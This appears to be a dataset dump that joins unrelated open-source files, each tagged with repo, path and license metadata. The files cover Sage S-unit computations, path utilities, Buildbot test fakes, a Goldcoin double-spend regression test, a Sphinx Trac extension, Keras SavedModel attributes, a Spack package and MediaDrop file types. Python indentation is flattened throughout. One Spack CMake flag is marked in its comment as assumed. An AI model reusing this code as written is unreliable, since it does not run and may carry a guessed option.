avec = list(f(S_vals)) # coordinates of A w.r.t ideals in T (mod p'th powers)
a1 = prod((alpha**e for alpha,e in zip(alphalist,avec)), K(1))
a /= a1
if debug: print("alpha component is {} with coords {}".format(a1,avec))
if debug:
if K==QQ:
print("continuing with quotient {} whose ideal should be a {}'th power: {}".format(a,p,a.factor()))
else:
print("continuing with quotient {} whose ideal should be a {}'th power: {}".format(a,p,K.ideal(a).factor()))
# 2. Now (a) is a p'th power, say (a)=B^p.
# Find B and the exponents of [B] w.r.t. basis of C[p]:
supp = a.support()
vals = [a.valuation(P) for P in supp]
assert all(v%p==0 for v in vals)
if K==QQ:
B = prod((P**(v//p) for P,v in zip(supp,vals)),K(1))
assert B**p == a.abs()
else:
B = prod((P**(v//p) for P,v in zip(supp,vals)),K.ideal(1))
assert B**p == K.ideal(a)
if debug:
print("B={}".format(B))
print("a={}".format(a))
if hKp:
bvec = coords_in_C_p(B,C,p)
a2 = prod((beta**e for beta,e in zip(betalist,bvec)), K(1))
a /= a2
supp = a.support()
vals = [a.valuation(P) for P in supp]
assert all(v%p==0 for v in vals)
B = prod((P**(v//p) for P,v in zip(supp,vals)),K.ideal(1))
assert B**p == K.ideal(a)
else:
bvec = []
a2 = 1
if debug: print("beta component is {} with coords {}".format(a2,bvec))
if debug: print("continuing with quotient {} which should be a p'th power times a unit".format(a))
# 3. Now (a) = (c)^p for some c, so a/c^p is a unit
if K!=QQ:
assert B.is_principal()
if debug: print("B={}".format(B))
a3 = B if K==QQ else IdealGenerator(B)
if debug: print("a3={}".format(a3))
a /= a3**p
if debug: print("dividing by {}th power of {}".format(p,a3))
if debug: print("continuing with quotient {} which should be a unit".format(a))
#4. Now a is a unit
# NB not a.is_unit which is true for all a in K^*. One could
# also test K.ring_of_integers()(a).is_unit().
if K==QQ:
assert a.abs()==1
else:
assert K.ideal(a).is_one()
if K == QQ:
if p == 2:
cvec = [1] if a == -1 else [0]
else:
cvec = []
else:
cvec = coords_in_U_mod_p(a,U,p)
if debug: print("gamma component has coords {}".format(cvec))
return KSp(avec + bvec + cvec);
return KSp, KSp_gens, from_KSp, to_KSp
"""Notes on computing the map to_KSp:
Given a in K(S,p):
(1) Write the principal ideal (a) in the form AB^p with A supported by
S and p'th power free.
Set IS = group of ideals spanned by S mod p'th powers, and
ISP=subgroup of that which map to 0 in C/C^p.
(2) Convert A to an element of ISP, hence find the coordinates of a
with respect to the generators in alphalist.
(3) Dividing out by that, now (a)=B^p (with a different B).
Write the ideal class [B], whose p'th power is trivial, in terms of
the generators of C[p]; then B=B1*(b) where the coefficients of B1
with respect to generators of Cl[p] give the coordinates of the result
with respect to the generators in betalist.
(4) Dividing out by that, and by b^p, we have (a)=(1), so a is a unit.
Now a can be expressed in terms of the unit generators (fundamental
units and, if necessary, a root of unity).
"""
# Over QQ we can do x.is_S_unit(S) when x is an element but not an
# ideal; over other number fields only ideals have the method, not
# elements!
def is_S_unit(a, S):
r"""Returns True iff a is an S-unit where a is in Q or in a number
field K and S is a list of primes of K.
INPUT:
- ``a`` (integer, rational or number field element or ideal) --
any integer or rational number, or number field element, or
fractional ideal.
- ``S`` (list) -- list of prime numbers or prime ideals
OUTPUT:
(boolean) ``True`` if and only if ``a`` is an ``S``-unit.
"""
K = a.parent()
# rationals have an is_S_unit method:
if K in [ZZ,QQ]:
return QQ(a).is_S_unit(S)
# fractional ideals also have such a method:
try:
return a.is_S_unit(S)
except AttributeError:
return K.ideal(a).is_S_unit(S)
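# For instance (illustrative, not executed here): is_S_unit(QQ(8), [2])
# should return True, since 8 = 2^3 becomes a unit once 2 is inverted,
# whereas is_S_unit(QQ(6), [2]) should return False because of the factor 3.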
def unramified_outside_S(L,S, p=None, debug=False):
r"""Test whether ``L`` is unramified over its base outside ``S``.
INPUT:
- ``L`` (relative number field) -- a relative number field with base field `K`.
- ``S`` (list) -- a list of primes of `K`.
- ``p`` (prime or ``None`` (default)) -- if not ``None``, a prime number.
- ``debug`` (boolean (default ``False``)) -- debugging flag.
OUTPUT:
(boolean) ``True`` if and only if 'L/K' is unramified outside `S`.
If `p` is not ``None`` only test primes dividing `p`.
"""
# This one-liner works but is slow
# return is_S_unit(L.relative_discriminant(),S)
if debug:
print("testing ramification of {}".format(L))
f = L.defining_polynomial()
d = f.discriminant()
K = f.base_ring()
if K==QQ:
D = d
else:
D = K.ideal(d)
for P in S:
for _ in range(D.valuation(P)):
D /= P
# now D is the prime-to-S part of disc(f)
if debug:
print("Prime-to-S part of disc = {} with norm {}".format(D,D.absolute_norm()))
try:
bads = D.prime_factors()
except AttributeError:
bads = D.support()
if p is not None:
p = K(p)
bads = [P for P in bads if p.valuation(P)>0]
if debug:
print("bads = {}".format(bads))
if not bads:
if debug:
print("OK: no bad primes in disc")
return True
if any(d.valuation(P)%2==1 for P in bads):
if debug:
print("NO: disc has odd valn at some bad primes in disc")
return False
# Now d is divisible by one or more primes not in S, to even
# powers, and we must work harder to see if L is ramified at these
# primes.
if debug:
print("final check of {} bad primes in disc: {}".format(len(bads), bads))
for P in bads:
if debug:
print("Testing whether {} is ramified in L".format(P))
for Q in L.primes_above(P):
e = Q.relative_ramification_index()
if e>1:
if debug:
print("NO")
return False
if debug:
print("OK")
return True
| gpl-3.0 | 7,234,085,552,036,957,000 | 31.404973 | 124 | 0.585727 | false |
guorendong/iridium-browser-ubuntu | native_client/pnacl/driver/pathtools.py | 8 | 3069 | #!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pathtools is meant to be a drop-in replacement for "os.path"
#
# All pathnames passed into the driver are "normalized" to
# a posix representation (with / as the separator). For example,
# on Windows, C:\foo\bar.c would become /cygdrive/c/foo/bar.c
# On all other platforms, pathnames are already in the correct form.
#
# This is convenient for two reasons:
# 1) All of the tools invoked by the driver expect this type
# of pathname. (since on Windows, they are compiled with cygwin)
# 2) Everywhere in the driver, we can assume / is the path separator.
#
# Special functions:
#
# pathtools.normalize: Convert an OS-style path into a normalized path
# pathtools.tosys : Convert a normalized path into an OS-style path
# pathtools.touser : Convert a normalized path into a representation
# suitable for presentation to the user.
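# Illustrative behaviour when WINDOWS_MANGLE is True (hypothetical values,
# inferred from the functions below rather than tested):
#
#   tosys('/cygdrive/c/foo/bar.c')   -> 'C:\\foo\\bar.c'
#   join('/cygdrive/c/foo', 'bar.c') -> '/cygdrive/c/foo/bar.c'
#
# On non-Windows platforms these reduce to plain posixpath behaviour.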
import os
import platform
import posixpath
# This is only true when the driver is invoked on
# Windows, but outside of Cygwin.
WINDOWS_MANGLE = 'windows' in platform.system().lower()
def normalize(syspath):
""" Convert an input path into a normalized path. """
if WINDOWS_MANGLE:
# Recognize paths which are already normalized.
# (Should only happen during recursive driver calls)
if '\\' not in syspath:
return syspath
return syspath.replace('\\', '/')
else:
return syspath
# All functions below expect a normalized path as input
def touser(npath):
""" Convert a unix-style path into a user-displayable format """
return tosys(npath)
def tosys(npath):
""" Convert a normalized path into a system-style path """
if WINDOWS_MANGLE:
if npath.startswith('/cygdrive'):
components = npath.split('/')
assert(components[0] == '')
assert(len(components[2]) == 1)
drive = components[2]
components = components[3:]
return '%s:\\%s' % (drive.upper(), '\\'.join(components))
else:
# Work around for an issue that windows has opening long
# relative paths. http://bugs.python.org/issue4071
npath = os.path.abspath(unicode(npath))
return npath.replace('/', '\\')
else:
return npath
def join(*args):
return posixpath.join(*args)
def exists(npath):
return os.path.exists(tosys(npath))
def split(npath):
return posixpath.split(npath)
def splitext(npath):
return posixpath.splitext(npath)
def basename(npath):
return posixpath.basename(npath)
def dirname(npath):
return posixpath.dirname(npath)
def abspath(npath):
if WINDOWS_MANGLE:
# We always use absolute paths for (non-cygwin) windows
return npath
else:
return posixpath.abspath(npath)
def normpath(npath):
return posixpath.normpath(npath)
def isdir(npath):
return os.path.isdir(tosys(npath))
def isfile(npath):
return os.path.isfile(tosys(npath))
def getsize(npath):
return os.path.getsize(tosys(npath))
| bsd-3-clause | 8,624,855,698,261,831,000 | 28.228571 | 72 | 0.70088 | false |
shoelzer/buildbot | master/buildbot/test/fake/fakebuild.py | 6 | 3000 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
import posixpath
import mock
from twisted.python import components
from buildbot import config
from buildbot import interfaces
from buildbot.process import factory
from buildbot.process import properties
from buildbot.process import workerforbuilder
from buildbot.test.fake import fakemaster
from buildbot.worker import base
class FakeBuildStatus(properties.PropertiesMixin, object):
def __init__(self):
self.properties = properties.Properties()
def getInterestedUsers(self):
return []
def setWorkername(self, _):
pass
def setSourceStamps(self, _):
pass
def setReason(self, _):
pass
def setBlamelist(self, _):
pass
def buildStarted(self, _):
return True
setText = mock.Mock()
setText2 = mock.Mock()
setResults = mock.Mock()
def buildFinished(self):
pass
getBuilder = mock.Mock()
components.registerAdapter(
lambda build_status: build_status.properties,
FakeBuildStatus, interfaces.IProperties)
class FakeBuild(properties.PropertiesMixin):
def __init__(self, props=None, master=None):
self.build_status = FakeBuildStatus()
self.builder = fakemaster.FakeBuilderStatus(master)
self.workerforbuilder = mock.Mock(
spec=workerforbuilder.WorkerForBuilder)
self.workerforbuilder.worker = mock.Mock(spec=base.Worker)
self.builder.config = config.BuilderConfig(
name='bldr',
workernames=['a'],
factory=factory.BuildFactory())
self.path_module = posixpath
self.buildid = 92
self.number = 13
self.workdir = 'build'
self.locks = []
self.sources = {}
if props is None:
props = properties.Properties()
props.build = self
self.build_status.properties = props
def getSourceStamp(self, codebase):
if codebase in self.sources:
return self.sources[codebase]
return None
def allFiles(self):
return []
def getBuilder(self):
return self.builder
components.registerAdapter(
lambda build: build.build_status.properties,
FakeBuild, interfaces.IProperties)
| gpl-2.0 | 8,668,132,655,584,157,000 | 26.272727 | 79 | 0.687333 | false |
goldcoin/Goldcoin-GLD | qa/rpc-tests/txn_doublespend.py | 2 | 6932 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with a double-spend conflict
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class TxnMallTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 250,000 coins:
starting_balance = 250000
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 249969)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 249969 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# First: use raw transaction API to send 240,000 coins to node1_address,
# but don't broadcast:
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 249969)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = 240000
outputs[change_address] = 249998 - 240000 + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransaction(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends: 8,000 from the foo account and 20 from the bar account
txid1 = self.nodes[0].sendfrom("foo", node1_address, 8000, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 10,000 for another
# matured block, minus 8,000, minus 20, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 10000
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 249969+tx1["amount"]+tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29+tx2["amount"]+tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"]+tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
ds_tx = self.nodes[2].decoderawtransaction(doublespend["hex"])
print("------")
input0 = self.nodes[0].gettransaction(str(rawtx_input_0["txid"]))
input1 = self.nodes[0].gettransaction(rawtx_input_1["txid"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 20,000 for
# two more matured blocks, minus 240,000 for the double-spend, plus fees (which are
# negative):
expected = starting_balance + 20000 - 240000 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*"), expected)
# Final "" balance is starting_balance - amount moved to accounts - doublespend + subsidies +
# fees (which are negative)
assert_equal(self.nodes[0].getbalance("foo"), 249969)
assert_equal(self.nodes[0].getbalance("bar"), 29)
assert_equal(self.nodes[0].getbalance(""), starting_balance
-249969
- 29
-240000
+ 20000
+ fund_foo_tx["fee"]
+ fund_bar_tx["fee"]
+ doublespend_fee)
# Node1's "from0" account balance should be just the doublespend:
assert_equal(self.nodes[1].getbalance("from0"), 240000)
if __name__ == '__main__':
TxnMallTest().main()
| mit | -1,700,670,968,282,653,400 | 44.605263 | 112 | 0.586555 | false |
Lemma1/MAC-POSTS | doc_builder/sphinx-contrib/traclinks/sphinxcontrib/traclinks.py | 2 | 1062 | '''
Sphinx/docutils extension to create links to a Trac site using
a RestructuredText interpreted text role that looks like this:
:trac:`trac_link_text`
for example:
:trac:`#2015`
creates a link to ticket number 2015.
adapted from recipe here:
http://stackoverflow.com/questions/2096401/sphinx-generate-automatic-references-to-trac-tickets-and-changesets
'''
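# Illustrative conf.py snippet (hypothetical project values):
#
#   extensions = ['sphinxcontrib.traclinks']
#   traclinks_base_url = 'https://trac.example.org/myproject'
#
# after which :trac:`#2015` in a document links to that Trac instance.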
import urllib
from docutils import nodes, utils
def make_trac_link(name, rawtext, text, lineno, inliner,
options={}, content=[]):
env = inliner.document.settings.env
trac_url = env.config.traclinks_base_url
ref = trac_url + '/intertrac/' + urllib.quote(text, safe='')
node = nodes.reference(rawtext, utils.unescape(text), refuri=ref, **options)
return [node],[]
# setup function to register the extension
def setup(app):
app.add_config_value('traclinks_base_url',
'http://trac.edgewall.com/trac',
'env')
app.add_role('trac', make_trac_link) | mit | 2,804,587,890,816,942,000 | 26.756757 | 110 | 0.640301 | false |
petewarden/tensorflow | tensorflow/python/keras/saving/saved_model/serialized_attributes.py | 1 | 13351 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper classes that list&validate all attributes to serialize to SavedModel.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import def_function
from tensorflow.python.keras.saving.saved_model import constants
from tensorflow.python.keras.saving.saved_model import save_impl
from tensorflow.python.keras.utils.generic_utils import LazyLoader
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.training.tracking.tracking import AutoTrackable
# TODO(b/134426265): Switch back to single-quotes to match the rest of the file
# once the issue with copybara is fixed.
# pylint:disable=g-inconsistent-quotes
base_layer = LazyLoader(
"base_layer", globals(),
"tensorflow.python.keras.engine.base_layer")
training_lib = LazyLoader(
"training_lib", globals(),
"tensorflow.python.keras.engine.training")
metrics = LazyLoader("metrics", globals(),
"tensorflow.python.keras.metrics")
recurrent = LazyLoader(
"recurrent", globals(),
"tensorflow.python.keras.layers.recurrent")
# pylint:enable=g-inconsistent-quotes
class SerializedAttributes(object):
"""Class that tracks and validates all serialization attributes.
Keras models contain many Python-defined components. For example, the
trainable_variable property lists the model's trainable variables by
recursively retrieving the trainable variables from each of the child layers.
Another example is model.call, a python function that calls child layers and
adds ops to the backend graph.
Only Tensorflow checkpointable objects and functions can be serialized to
SavedModel. Serializing a Keras model as-is results in a checkpointable object
that does not resemble a Keras model at all. Thus, extra checkpointable
objects and functions must be created during serialization.
**Defining new serialized attributes**
Child classes should be defined using:
SerializedAttributes.with_attributes(
'name', checkpointable_objects=[...], functions=[...], copy_from=[...])
This class is used to cache generated checkpointable objects and functions,
ensuring that new objects and functions are generated a single time.
**Usage during serialization**
Each Layer/Model object should have a corresponding instance of
SerializedAttributes. Create a new instance by calling
`SerializedAttributes.new(obj)`. Objects and functions may be saved using
`.set_and_validate_checkpointable_objects`/`.set_and_and_validate_functions`.
The properties `.checkpointable_objects` and `.functions` returns the cached
values.
**Adding/changing attributes to save to SavedModel**
1. Change the call to `SerializedAttributes.with_attributes` in the correct
class:
- CommonEndpoints: Base attributes to be added during serialization. If
these attributes are present in a Trackable object, it can be
deserialized to a Keras Model.
- LayerAttributes: Attributes to serialize for Layer objects.
- ModelAttributes: Attributes to serialize for Model objects.
2. Update class docstring
3. Update arguments to any calls to `set_and_validate_*`. For example, if
`call_raw_tensors` is added to the ModelAttributes function list, then
a `call_raw_tensors` function should be passed to
`set_and_validate_functions`.
**Common endpoints vs other attributes**
Only common endpoints are attached directly to the root object. Keras-specific
attributes are saved to a separate trackable object with the name "keras_api".
The number of objects attached to the root is limited because any naming
conflicts will cause user code to break.
Another reason is that this will only affect users who call
`tf.saved_model.load` instead of `tf.keras.models.load_model`. These are
advanced users who are likely to have defined their own tf.functions and
trackable objects. The added Keras-specific attributes are kept out of the way
in the "keras_api" namespace.
Properties defined in this class may be used to filter out keras-specific
attributes:
- `functions_to_serialize`: Returns dict of functions to attach to the root
object.
- `checkpointable_objects_to_serialize`: Returns dict of objects to attach to
the root object (including separate trackable object containing
keras-specific attributes)
All changes to the serialized attributes must be backwards-compatible, so
attributes should not be removed or modified without sufficient justification.
"""
@staticmethod
def with_attributes(
name, checkpointable_objects=None, functions=None, copy_from=None):
"""Creates a subclass with all attributes as specified in the arguments.
Args:
name: Name of subclass
checkpointable_objects: List of checkpointable objects to be serialized
in the SavedModel.
functions: List of functions to be serialized in the SavedModel.
copy_from: List of other SerializedAttributes subclasses. The returned
class will copy checkpoint objects/functions from each subclass.
Returns:
Child class with attributes as defined in the `checkpointable_objects`
and `functions` lists.
"""
checkpointable_objects = checkpointable_objects or []
functions = functions or []
if copy_from is not None:
for cls in copy_from:
checkpointable_objects.extend(cls.all_checkpointable_objects)
functions.extend(cls.all_functions)
classdict = {
'all_checkpointable_objects': set(checkpointable_objects),
'all_functions': set(functions)}
return type(name, (SerializedAttributes,), classdict)
@staticmethod
def new(obj):
"""Returns a new SerializedAttribute object."""
if isinstance(obj, training_lib.Model):
return ModelAttributes()
elif isinstance(obj, metrics.Metric):
return MetricAttributes()
elif isinstance(obj, recurrent.RNN):
return RNNAttributes()
elif isinstance(obj, base_layer.Layer):
return LayerAttributes()
else:
raise TypeError('Internal error during serialization: Expected Keras '
'Layer object, got {} of type {}'.format(obj, type(obj)))
def __init__(self):
self._object_dict = {}
self._function_dict = {}
self._keras_trackable = AutoTrackable()
@property
def functions(self):
"""Returns dictionary of all functions."""
return {key: value for key, value in self._function_dict.items()
if value is not None}
@property
def checkpointable_objects(self):
"""Returns dictionary of all checkpointable objects."""
return {key: value for key, value in self._object_dict.items()
if value is not None}
@property
def functions_to_serialize(self):
"""Returns functions to attach to the root object during serialization."""
functions = {}
for key, v in self.functions.items():
if key in CommonEndpoints.all_functions:
functions[key] = (v.wrapped_call if isinstance(v, save_impl.LayerCall)
else v)
return functions
@property
def objects_to_serialize(self):
"""Returns objects to attach to the root object during serialization."""
objects = {key: value for key, value in self.checkpointable_objects.items()
if key in CommonEndpoints.all_checkpointable_objects}
objects[constants.KERAS_ATTR] = self._keras_trackable
return objects
def set_and_validate_functions(self, function_dict):
"""Saves function dictionary, and validates dictionary values."""
for key in self.all_functions:
if key in function_dict:
if (function_dict[key] is not None and # Not all functions are required
not isinstance(function_dict[key],
(def_function.Function, save_impl.LayerCall))):
raise ValueError(
'Function dictionary contained a non-function object: {} (for key'
' {})'.format(function_dict[key], key))
fn = function_dict[key]
self._function_dict[key] = fn
# Extract TensorFlow `Function` from LayerCall.
tf_fn = fn.wrapped_call if isinstance(fn, save_impl.LayerCall) else fn
setattr(self._keras_trackable, key, tf_fn)
else:
raise ValueError('Function {} missing from serialized function dict.'
.format(key))
return self.functions
def set_and_validate_objects(self, object_dict):
"""Saves objects to a dictionary, and validates the values."""
for key in self.all_checkpointable_objects:
if key in object_dict:
if not isinstance(object_dict[key], trackable.Trackable):
raise ValueError(
'Object dictionary contained a non-trackable object: {} (for key'
' {})'.format(object_dict[key], key))
self._object_dict[key] = object_dict[key]
setattr(self._keras_trackable, key, object_dict[key])
else:
raise ValueError(
'Object {} missing from serialized object dict.'.format(key))
return self.checkpointable_objects
class CommonEndpoints(SerializedAttributes.with_attributes(
'CommonEndpoints',
checkpointable_objects=['variables', 'trainable_variables',
'regularization_losses'],
functions=['__call__', 'call_and_return_all_conditional_losses',
'_default_save_signature'])):
"""Common endpoints shared by all models loadable by Keras.
List of all attributes:
variables: List of all variables in the model and its sublayers.
trainable_variables: List of all trainable variables in the model and its
sublayers.
regularization_losses: List of all unconditional losses (losses not
dependent on the inputs) in the model and its sublayers.
__call__: Function that takes inputs and returns the outputs of the model
call function.
call_and_return_all_conditional_losses: Function that returns a tuple of
(call function outputs, list of all losses that depend on the inputs).
_default_save_signature: Traced model call function. This is only included
if the top level exported object is a Keras model.
"""
class LayerAttributes(SerializedAttributes.with_attributes(
'LayerAttributes',
checkpointable_objects=['non_trainable_variables', 'layers', 'metrics',
'layer_regularization_losses', 'layer_metrics'],
functions=['call_and_return_conditional_losses', 'activity_regularizer_fn'],
copy_from=[CommonEndpoints]
)):
"""Layer checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from CommonEndpoints
non_trainable_variables: List of non-trainable variables in the layer and
its sublayers.
layers: List of all sublayers.
metrics: List of all metrics in the layer and its sublayers.
call_and_return_conditional_losses: Function that takes inputs and returns a
tuple of (outputs of the call function, list of input-dependent losses).
The list of losses excludes the activity regularizer function, which is
separate to allow the deserialized Layer object to define a different
activity regularizer.
activity_regularizer_fn: Callable that returns the activity regularizer loss
layer_regularization_losses: List of losses owned only by this layer.
layer_metrics: List of metrics owned by this layer.
"""
class ModelAttributes(SerializedAttributes.with_attributes(
'ModelAttributes',
copy_from=[LayerAttributes])):
"""Model checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from LayerAttributes (including CommonEndpoints)
"""
# TODO(kathywu): Add attributes `compile_losses` and `compile_metrics`, which
# list all losses and metrics defined by `model.compile`.
class MetricAttributes(
SerializedAttributes.with_attributes(
'MetricAttributes',
checkpointable_objects=['variables'],
functions=[],
)):
"""Attributes that are added to Metric objects when saved to SavedModel.
List of all attributes:
variables: list of all variables
"""
pass
class RNNAttributes(SerializedAttributes.with_attributes(
'RNNAttributes',
checkpointable_objects=['states'],
copy_from=[LayerAttributes])):
"""RNN checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from LayerAttributes (including CommonEndpoints)
states: List of state variables
"""
| apache-2.0 | 5,526,067,801,508,030,000 | 41.519108 | 80 | 0.713729 | false |
iulian787/spack | var/spack/repos/builtin/packages/kassiopeia/package.py | 2 | 2937 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Kassiopeia(CMakePackage):
"""Simulation of electric and magnetic fields and particle tracking."""
homepage = "https://katrin-experiment.github.io/Kassiopeia/"
url = "https://github.com/KATRIN-Experiment/Kassiopeia/archive/v3.6.1.tar.gz"
git = "https://github.com/KATRIN-Experiment/Kassiopeia.git"
tags = ['hep']
maintainers = ['wdconinc']
version('3.7.5', sha256='8f28d08c7ef51e64221e0a4705f3cee3a5d738b8cdde5ce9fa58a3a0dd14ae05')
version('3.7.4', sha256='c1514163a084530930be10dbe487fb1950ccbc9662a4a190bdecffbd84a71fd4')
version('3.7.3', sha256='a8753585b9fa0903e1f5f821c4ced3cddd72792ad7e6075a7e25318f81ad9eaa')
version('3.7.2', sha256='bdfdf8c26fa5ad19e8b9c6eb600dfbd3c8218cd695ce067f10633b63bd192f92')
version('3.7.1', sha256='b22ae2fe5c2271bdf6aaf65d9ecf57ff0d6a88d28ad26d176e1129f0e58faea4')
version('3.7.0', sha256='32a3e98c77d1b97fe9862cf1d8c6ba8e6c82fb9295a6a217c7ce77cbec751046')
version('3.6.1', sha256='30193d5384ad81b8570fdcd1bb35b15cc365ab84712819ac0d989c6f5cf6f790')
version('3.5.0', sha256='b704d77bd182b2806dc8323f642d3197ce21dba3d456430f594b19a7596bda22')
version('3.4.0', sha256='4e2bca61011e670186d49048aea080a06c3c95dacf4b79e7549c36960b4557f4')
variant("root", default=False,
description="Include support for writing ROOT files")
variant("vtk", default=False,
description="Include visualization support through VTK")
variant("mpi", default=False,
description="Include MPI support for field calculations")
variant("tbb", default=False,
description="Include Intel TBB support for field calculations")
variant("opencl", default=False,
description="Include OpenCL support for field calculations")
depends_on('[email protected]:', type='build')
depends_on('zlib')
depends_on('[email protected]:', when='+root')
depends_on('[email protected]:', when='+vtk')
depends_on('mpi', when='+mpi')
depends_on('tbb', when='+tbb')
depends_on('opencl', when='+opencl')
def cmake_args(self):
args = []
if self.spec.satisfies('+vtk'):
args.append('-DKASPER_USE_VTK=ON')
else:
args.append('-DKASPER_USE_VTK=OFF')
if self.spec.satisfies('+tbb'):
args.append('-DKASPER_USE_TBB=ON')
else:
args.append('-DKASPER_USE_TBB=OFF')
if self.spec.satisfies('+mpi'):
args.append('-DKEMField_USE_MPI=ON')
else:
args.append('-DKEMField_USE_MPI=OFF')
if self.spec.satisfies('+opencl'):
args.append('-DKEMField_USE_OPENCL=ON')
else:
args.append('-DKEMField_USE_OPENCL=OFF')
        # Assumed flag name (mirrors the KASPER_USE_* pattern above); the +root
        # variant is otherwise never forwarded to CMake.
        if self.spec.satisfies('+root'):
            args.append('-DKASPER_USE_ROOT=ON')
        else:
            args.append('-DKASPER_USE_ROOT=OFF')
        return args
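    # Usage sketch (illustrative spec only): the variants above are toggled with
    # spack's standard spec syntax, e.g.
    #   spack install kassiopeia +root +vtk +mpi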
| lgpl-2.1 | 4,810,716,133,183,114,000 | 42.835821 | 95 | 0.684372 | false |
midroid/mediadrop | mediadrop/lib/filetypes.py | 10 | 5359 | # This file is a part of MediaDrop (http://www.mediadrop.net),
# Copyright 2009-2015 MediaDrop contributors
# For the exact contribution history, see the git revision log.
# The source code contained in this file is licensed under the GPLv3 or
# (at your option) any later version.
# See LICENSE.txt in the main project directory, for more information.
from mediadrop.lib.i18n import _
from mediadrop.plugin.events import (media_types as registered_media_types,
observes)
__all__ = [
'guess_container_format',
'guess_media_type',
'guess_mimetype',
'registered_media_types',
]
AUDIO = u'audio'
VIDEO = u'video'
AUDIO_DESC = u'audio_desc'
CAPTIONS = u'captions'
@observes(registered_media_types)
def register_default_types():
default_types = [
(VIDEO, _('Video')),
